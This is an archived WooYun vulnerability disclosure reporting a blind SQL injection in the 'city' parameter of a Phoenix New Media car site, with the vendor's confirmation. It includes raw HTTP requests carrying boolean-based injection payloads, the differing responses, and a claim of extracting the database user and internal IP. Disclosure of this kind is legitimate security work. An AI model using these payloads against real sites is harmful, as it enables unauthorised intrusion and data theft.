当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-098344

漏洞标题:凤凰网某站SQL盲注

相关厂商:凤凰网

漏洞作者: Forever80s

提交时间:2015-02-27 09:32

修复时间:2015-04-13 16:58

公开时间:2015-04-13 16:58

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-02-27: 细节已通知厂商并且等待厂商处理中
2015-03-02: 厂商已经确认,细节仅向厂商公开
2015-03-12: 细节向核心白帽子及相关领域专家公开
2015-03-22: 细节向普通白帽子公开
2015-04-01: 细节向实习白帽子公开
2015-04-13: 细节向公众公开

简要描述:

详细说明:

漏洞证明:

网站car.auto.ifeng.com
http://car.auto.ifeng.com/series/ajaxJiangJiaNews.atp?serialId=7430&num=3&city=beijing23782868
参数city,or型注入,根据返回数据大小来判断是否成立
poc:

GET /series/ajaxJiangJiaNews.atp?serialId=7430&city=beijing23782868'%20+or%20'5160'%3d'560&num=3 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.0.249.78 Safari/532.5
Accept: application/json, text/javascript, */*
Accept-Language: en-us,en;q=0.8,en-us,en;q=0.5
Referer: http://car.auto.ifeng.com/series/7430/
X-Requested-With: XMLHttpRequest
Cache-Control: no-cache
X-Forwarded-For: 127.0.0.1
Host: car.auto.ifeng.com
Cookie: JSESSIONID=abc2JhRmAO6Tw-UjNXyUu; IPLOC=unknown; IPUV=1502180222200865
Accept-Encoding: gzip, deflate
Content-Length: 4
HTTP/1.1 200 OK
Server: Tengine
Date: Wed, 25 Feb 2015 14:28:29 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
Vary: Accept-Encoding
Expires: Wed, 25 Feb 2015 14:30:29 GMT
Cache-Control: max-age=120
Nginx-Cache: MISS
forward: web207
pserver: tengine198
Content-Length: 43
{"state":"success","total":"0","data":[]}
GET /series/ajaxJiangJiaNews.atp?serialId=7430&city=beijing23782868'%20+or%20'5160'%3d'5160&num=3 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.0.249.78 Safari/532.5
Accept: application/json, text/javascript, */*
Accept-Language: en-us,en;q=0.8,en-us,en;q=0.5
Referer: http://car.auto.ifeng.com/series/7430/
X-Requested-With: XMLHttpRequest
Cache-Control: no-cache
X-Forwarded-For: 127.0.0.1
Host: car.auto.ifeng.com
Cookie: JSESSIONID=abc2JhRmAO6Tw-UjNXyUu; IPLOC=unknown; IPUV=1502180222200865
Accept-Encoding: gzip, deflate
Content-Length: 4
HTTP/1.1 200 OK
Server: Tengine
Date: Wed, 25 Feb 2015 14:28:08 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
Vary: Accept-Encoding
Expires: Wed, 25 Feb 2015 14:30:08 GMT
Cache-Control: max-age=120
Nginx-Cache: MISS
forward: web207
pserver: tengine198
Content-Length: 1714
{"state":"success","total":"2","data":[{"id":"131539","title":"\u9655\u897f\u80dc\u548c\u98ce\u795e\u201c\u611f\u6069\u4e09\u79e6\u00b7\u65b0\u5e74\u56e2\u8d2d\u4f1a
\u201d","thumb":"http:\/\/img.auto.ifeng.com\/uploadfile\/2013\/1230\/20131230015334450.png","url":"http:\/\/xian.auto.ifeng.com\/jiangjia
\/2013\/1230\/4152.shtml","inputtime":"12\u670830\u65e5","middle_title":"\u98ce\u795e\u201c\u611f\u6069\u4e09\u79e6\u00b7\u65b0\u5e74\u56e2\u8d2d\u4f1a
\u201d","description":"2013\u5e7412\u670828\u65e5\u4e0b\u53482\u70b9,\u4e1c\u98ce\u98ce\u795e\u9655\u897f\u80dc\u548c4S\u5e97\u5f15\u7206\u65b0\u6625\u6cb8\u70b9\uff0c
\u57282013\u5e74\u7ec8\uff0c\u4e3a\u4e09\u79e6\u65b0\u8001\u5ba2\u6237\u9001\u6765\u4e00\u573a\u6e29\u99a8\u7684\u65b0\u5e74\u56e2\u8d2d\u76db\u4f1a\u3002\u6b64\u6b21\u6d3b
\u52a8\u4e1c\u98ce\u98ce\u795e\u5168\u7cfb..."},{"id":"128915","title":"2013\u6b3e\u672c\u7530\u601d\u57df \u90e8\u5206\u8f66\u578b\u53ef\u4f18\u60e01.5\u4e07","thumb":"http:\/
\/a2.ifengimg.com\/autoimg\/62\/77\/1727762_8.jpg","url":"http:\/\/xian.auto.ifeng.com\/jiangjia\/2013\/1225\/4080.shtml","inputtime":"12\u670825\u65e5","middle_title":"\u672c
\u7530\u601d\u57df\u4f18\u60e01.5\u4e07","description":"\u8fd1\u65e5\uff0c\u51e4\u51f0\u6c7d\u8f66\u533a\u57df\u7f16\u8f91\u4ece\u897f\u5b89\u5730\u533a\u9655\u897f\u5965\u672c
\u6c7d\u8f66\u7ecf\u9500\u5546\u5904\u83b7\u6089\uff0c\u76ee\u524d\u8be5\u5e97\u601d\u57df\u8f66\u578b\u6709\u5c11\u91cf\u73b0\u8f66\u5728\u552e\uff0c\u989c\u8272\u4e3b
\u8981\u4ee5\u5e93\u5b58\u4e3a\u4e3b\u3002\u8d2d\u8f66\u53ef\u4f18\u60e01.50\u4e07\u5143\u3002\u5bf9\u8fd9\u6b3e\u8f66\u611f\u5174\u8da3\u7684\u670b\u53cb\u4eec\u4e0d\u59a8\u8fdb
\u4e00\u6b65\u5173\u6ce8\u4e00\u4e0b\u3002"}]}


写程序猜解当前用户user()
cms_read@ip
ip内网ip
证明问题存在。

修复方案:

版权声明:转载请注明来源 Forever80s@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:10

确认时间:2015-03-02 11:00

厂商回复:

非常非常感谢您对凤凰网信息安全的帮助。

最新状态:

暂无


漏洞评价:

评论

  1. 2015-03-02 18:53 | 龍 、 ( 普通白帽子 | Rank:398 漏洞数:135 | 你若安好 我就是晴天)

    APP?